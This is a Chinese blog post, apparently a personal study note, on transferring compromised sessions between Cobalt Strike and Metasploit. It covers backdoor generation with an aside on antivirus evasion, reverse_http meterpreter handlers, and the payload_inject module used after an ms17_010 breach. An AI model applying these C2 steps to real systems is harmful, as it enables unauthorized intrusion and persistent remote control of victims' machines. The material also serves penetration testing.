cobalt strike 会话转移

最新推荐文章于 2024-06-06 10:39:27 发布
最新推荐文章于 2024-06-06 10:39:27 发布
阅读量2.3k 收藏 3
点赞数 1
分类专栏: 内网渗透 工具 文章标签: 网络安全 渗透测试 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/118113034
版权

cobalt strike 会话转移

我们在搞定了一台主机后,往往想要对其进行权限维持,提权的操作,这时后我们就可以使用cs生成一个后门程序,通过我们获得的webshell上传执行来进行进一步的利用。这里有几个容易忘记得操作,这里记录下来,方便以后复习。

一、CS会话传递到msf进行进一步利用

1.1 运行服务端

服务端一般放在我们得VPS等拥有公网ip地址的主机上面
我们在vps上面执行

cd obaltstrike4.3
./teamserver 192.168.248.142 111111

IP地址为我vps服务器本身的IP,111111为客户端连接的密码
这时候我们可以执行

netstat -ano | grep 50050

看到该端口已经打开了,teamserver默认在该端口监听

1.2 运行客户端

同样在我们的物理机上面同样要有cs的环境,进入里面有一个shell的可执行文件,我们执行它

./start.sh

这时候就会打开登录配置界面
输入连接的ip、端口号、用户名、密码即可登录成功

1.3 生成后门程序

1.3.1 设置监听器

在这里插入图片描述
在这里插入图片描述
http hosts 与http host(stager)填一样的为服务器ip,端口随便填为我本地的监听端口

1.3.2 生成后门

在这里插入图片描述
这里可选的种类很多,这里我们选择windows executable
在这里插入图片描述
选择号监听器,和输出的类型,其中有一个windows server 可以在启动项中使用,普通的是不能在启动项中使用的
同时windows executable是分段传输payload的,后门运行后会从服务端加载payload,所以可能会连接失败,还有一个windows executable(s)这是一个stageless,里面包含了完整的payload,所以相对来说较大。

1.4 运行后门程序

生成了后门后,把它发送到目标服务器运行,即可看到客户端有设备上线了!!!这玩意儿很容易被防火墙杀掉,考虑做一下免杀处理!

1.5添加会话

在这里插入图片描述
在这里插入图片描述
payload选择foreignhttp,stager主机填写运行msf的主机,ip也可自定义,添加完成后在选择payload串口选中刚添加的会话,然后点击choose即可

1.6 配置msf监听

进入msf,使用 exploit/mutil/handler模块,
然后设置lhost 为本机,lport为上一步添加会话时一致的端口,set payload windows/meterpreter/reverse_http
然后run
重新在客户端选择一次会话就成功了!!

二 msf会话传递到cs进行进一步利用

首先我们使用ms17_010或者其他漏洞打穿一个系统,进入到>meter界面,然后执行background,将该会话调度到后台,会回显一个session id给我们。
然后使用
use exploit/windows/local/payload_inject模块
set payload windows/meterpreter/reverse_http
set lhost 客户端主机ip
set lport 客户端监听器端口
set disablepayloadhandler true
set session id 上一步获得的sessionid
run
结束会回显进程id
然后我们到客户端就可以看到该进程id的主机上线了

Iwanturoot
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程自迁移插件】
AA8j的博客
10-25 2801
1. 服务端加载malleable配置文件 1.1 下载 下载地址:https://github.com/threatexpress/malleable-c2 下载cs对应版本配置文件: 我这里下载4.3版本的。 1.2 加载配置文件 下载完后放入CS根目录: 加载配置文件启动方式,只需要在末尾跟上配置文件就可以了: ./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile 2. 客户端加载cna插件 2.1 插件下载 下载地址:https://git
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 1024
cobaltstrike攻击流程,联动msf之socks代理
cs与msf权限传递
最新发布
gchoud的博客
06-06 997
1,先启动cs​​2,上传木马,上线主机3,msf配置一个反向连接的tcp监听4,cs配置一个Foreign HTTP监听器host,port就配置msf所在主机ip,端口就行5,选择spawn(权力委派的意思)进行转移,然后选中Foreign HTTP监听器就行了6,msf结果​​。
Cobalt Strike与Metasploit会话互转
zzgslh的博客
03-20 990
Cobalt Strike与Metasploit会话互转 一、前言 Cobalt Strike和Metasploit是渗透测试经常会用到的两个工具,Cobalt Strike 与 Metasploit在很多地方都是兼容的,所以我们便可以将 Metasploit攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike会话也能够传递到 Metasploit上。 二、Metasploit会话转到Cobaltstrike (1)首先通过Metasploit获取会话。 (2)会话
Cobaltstrike系列教程(六)文件/进程管理与键盘记录
J0o1ey Blog
08-09 5863
0x000-前文 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-文件管理 ①基础管理 选择一个会话,右键,目标–>文件管理 Upload为上传一个文件 ,Make Directory为创建文件夹,List Drives为列出盘符,refresh为刷新,这块很简单,就不一一讲了。 ②下载文件 ...
ATT&CK实战系列-红队实践一
weixin_45778886的博客
06-12 1227
靶机下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境配置 vnet1网卡: win7: 仅主机vnet1:192.168.52.143 NATvnet8:192.168.124.20 在C盘下运行phpstudy. win2008: 仅主机IP:192.168.52.138 win2k3: 仅主机IP:192.168.52.141 攻击机kali2019: NAT模式IP:192.168.124.26 DMZ区(win7渗透) 信
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 5737
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CobaltStrike4.1
03-10
1. **Team Server**:是Cobalt Strike的核心,负责管理Beacon会话、存储数据和执行任务。 2. **Beacon**:是植入到目标系统中的轻量级代理,用于执行命令、收集信息和进行横向移动。 3. **Malleable C2**:允许用户...
CobaltStrike4.0渗透测试手册
03-18
Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全中渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具。Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
cobaltstrike4.3.zip
12-03
在渗透测试过程中,Cobalt Strike的Meterpreter会话管理器也是一个关键组件。这个模块在4.3版本中提供了更多的API函数,使得测试人员可以在目标系统上执行更复杂的操作,如文件管理、注册表操作、进程控制等。同时,...
BOF-DLL-Inject:使用Cobalt Strike的信标目标文件实现手动Map DLL注入
04-14
BOF-DLL-注入 BOF DLL注入是一个自定义的,该使用手动映射DLL注入以便将dll全部从内存迁移到进程中。 好处 不太可能被签名 DLL有效负载保留在内存中,永不接触磁盘 附加功能易于实现 DLL未在内核领域注册为包括EPROCESS结构的模块 笔记 要了解我如何开发此工具以及有关该工具的更多信息,请参阅我的博客
cobaltstrike4.0
05-27
4. **更丰富的团队服务器功能**:团队服务器是Cobalt Strike的指挥中心,用于管理Beacon会话和任务。新版本可能强化了审计和管理功能,便于操作员跟踪和控制整个渗透测试过程。 5. **自动化和脚本支持**:Cobalt ...
2021-11-11
咖啡有点苦的博客
11-11 489
标题:设置环境变量 1.找到环境变量,在系统变量里面修改,因为系统变量里面调整之后全部都能显示出来。 2.在系统变量里面新建一个叫JAVA_HOME的路径,然后把java中jdk12.0的路径填写进去 3.然后找到path继续设置环境变量,找到java jdk12.0中bin的路径填写进去。 4.找到jre命令,打开dos命令,用命令进到java里jdk里面然后输入jre命令自动生成jre,生成之后找到环境变量里path,把jre中bin文件所在的位置填写进去,完成环境变量配置。 5.在dos命令窗口输入j
152.网络安全渗透测试—[Cobalt Strike系列]—[会话管理/派生]
qwsn
03-24 2522
一、会话管理 1、实验环境 2、会话派生 (1)128的cs会话派生给128的cs本身 (2)128的cs会话派生给129的cs会话 (3)128的cs会话派生到129的msf会话 (4)129的msf生成木马 + 128的cs获取新会话 (5)129的msf溢出exp发到128的cs会话 (6)129的msf会话派生给128的cs会话
内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移
m0_59598029的博客
03-06 793
也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移Cobalt Strike。内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )(3)开启 Cobalt Strike 工具.在 MSF 会话转移 会话到 CS 上.在 CS 会话转移 会话到 MSF 上.(5)会话转移到 MSF 中.(5)会话转移到 CS 中.(1)上线 MSF 会话.(2)进行监听模式.(4)添加一个监听.(2)添加一个监听.
内网渗透实战——红日ATT&CK系列靶场(二)学习笔记
ierciyuan的博客
09-14 3030
内网渗透实战攻打红日靶场02,包括环境配置、信息收集、漏洞利用、内网渗透等操作。
Cobalt Strike使用教程
huangyongkang666的博客
04-03 5992
Cobalt Strike使用教程 1.CS简介 ​ Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器,是域渗透,内网渗透,内网漫游,后渗透手段利器,但前提是获得一台主机的shell。早期版本CobaltSrtike依赖Metasploit框架,而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作 ​ Cobalt Strike集成了端口转发、扫
Cobalt Strike使用教程——实战篇
Captain_RB的博客
06-10 5697
本文主要介绍实战中 **Cobalt Strike** 4.3 的常用操作,包括Malleable C2配置与分析、监听器和Beacon Payload配置与区别、进程注入与欺骗、与MSF联动以及插件使用方法。
Cobalt Strike安装
08-24
要安装Cobalt Strike,您需要遵循以下步骤: 1. 首先,确保您具有有效的许可证。Cobalt Strike是商业软件,您需要购买合法的许可证才能使用。 2. 在获得许可证后,访问Cobalt Strike的官方网站(https://www.cobaltstrike.com/)并下载安装程序。 3. 解压缩下载的文件。您将获得一个名为"cobaltstrike.jar"的Java可执行文件。 4. 确保您的系统已经安装了Java Runtime Environment(JRE)。如果没有安装,请先安装JRE。 5. 打开命令行终端,并导航到cobaltstrike.jar所在的目录。 6. 使用以下命令来启动Cobalt Strike: ``` java -jar cobaltstrike.jar ``` 这将启动Cobalt Strike的图形用户界面(GUI)。 7. 在Cobalt Strike GUI中,您可以输入您的许可证信息并完成安装过程。 请记住,在使用Cobalt Strike时要遵守法律法规,并且只能在合法授权的环境中使用该软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值